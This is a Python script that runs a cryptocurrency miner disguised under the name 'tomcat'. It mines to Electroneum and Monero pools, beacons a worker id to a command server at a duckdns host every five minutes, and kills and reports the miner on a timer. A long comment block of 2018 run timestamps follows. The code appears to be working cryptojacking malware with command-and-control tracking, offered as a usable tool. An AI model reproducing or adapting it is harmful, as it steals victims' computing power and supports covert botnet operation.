import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:18:03.943709
#2018-02-17 17:07:06.431239
#2018-02-17 18:55:06.164459
#2018-02-17 20:42:07.224212
#2018-02-17 22:29:05.330382
#2018-02-18 00:12:01.639389
#2018-02-18 02:03:05.902867
#2018-02-18 03:51:01.290392
#2018-02-18 05:37:01.701603
#2018-02-18 07:30:01.560030
#2018-02-18 09:18:01.939740
#2018-02-18 11:04:04.430209
#2018-02-18 12:51:01.915015
#2018-02-18 14:37:05.799198
#2018-02-18 16:26:07.208570
#2018-02-18 18:14:07.438260
#2018-02-18 19:59:05.016338
#2018-02-18 21:46:05.615540
#2018-02-18 23:36:05.626049
#2018-02-19 01:22:05.597699
#2018-02-19 03:11:02.186576
#2018-02-19 04:56:06.545946
#2018-02-19 06:40:05.773839
#2018-02-19 08:30:04.983997
#2018-02-19 10:19:06.431688
#2018-02-19 12:07:07.004161
#2018-02-19 13:53:01.378754
#2018-02-19 15:43:08.502463
#2018-02-19 17:32:09.074784
#2018-02-19 19:22:05.841249
#2018-02-19 21:10:04.103728
#2018-02-19 22:56:06.102088
#2018-02-20 00:41:04.680450
#2018-02-20 02:31:05.258961
#2018-02-20 04:20:04.989354
#2018-02-20 06:04:01.556832
#2018-02-20 07:49:06.189694
#2018-02-20 09:35:06.200400
#2018-02-20 11:18:09.021572
#2018-02-20 13:05:09.669804
#2018-02-20 14:50:07.712383
#2018-02-20 16:35:07.180163
#2018-02-20 18:21:09.565384
#2018-02-20 20:11:01.862601
#2018-02-20 21:57:01.556131
#2018-02-20 23:39:06.147618
#2018-02-21 01:25:08.408765
#2018-02-21 03:14:04.635884
#2018-02-21 05:03:04.229182
#2018-02-21 06:50:05.610194
#2018-02-21 08:37:07.158782
#2018-02-21 10:23:01.622348
#2018-02-21 12:10:07.685568
#2018-02-21 14:00:09.195956
#2018-02-21 15:46:07.388874
#2018-02-21 17:38:10.182035
#2018-02-21 19:23:08.071303
#2018-02-21 21:12:08.032635
#2018-02-21 22:59:01.443199
#2018-02-22 00:46:04.000228
#2018-02-22 02:33:05.976129
#2018-02-22 04:19:01.226762
#2018-02-22 06:06:04.007900
#2018-02-22 07:51:03.725907
#2018-02-22 09:39:04.714571
#2018-02-22 11:24:07.237065
#2018-02-22 13:11:06.574850
#2018-02-22 15:02:01.636411
#2018-02-22 16:47:02.155430
#2018-02-22 18:34:04.647321
#2018-02-22 20:26:01.737770
#2018-02-22 22:12:04.315111
#2018-02-22 23:58:05.744380
#2018-02-23 01:45:07.862857
#2018-02-23 03:35:01.493248
#2018-02-23 05:21:01.411885
#2018-02-23 07:07:02.228939
#2018-02-23 08:56:06.679793
#2018-02-23 11:14:04.879887
#2018-02-23 13:08:06.930598
#2018-02-23 14:53:04.633797
#2018-02-23 16:41:09.282266
#2018-02-23 18:29:04.153973
#2018-02-23 20:15:10.007631
#2018-02-23 22:04:07.360650
#2018-02-23 23:53:04.300736
#2018-02-24 01:44:05.791128
#2018-02-24 03:36:04.316329
#2018-02-24 05:20:08.986747
#2018-02-24 07:08:04.305522
#2018-02-24 08:55:02.889908
#2018-02-24 10:58:01.445695
#2018-02-24 12:46:01.896836
#2018-02-24 14:35:05.823652
#2018-02-24 16:21:04.815289
#2018-02-24 18:15:09.193569
#2018-02-24 20:02:05.587650
#2018-02-24 21:44:05.213387
#2018-02-25 00:41:02.198563
#2018-02-25 04:33:04.981140
#2018-02-25 08:00:04.763733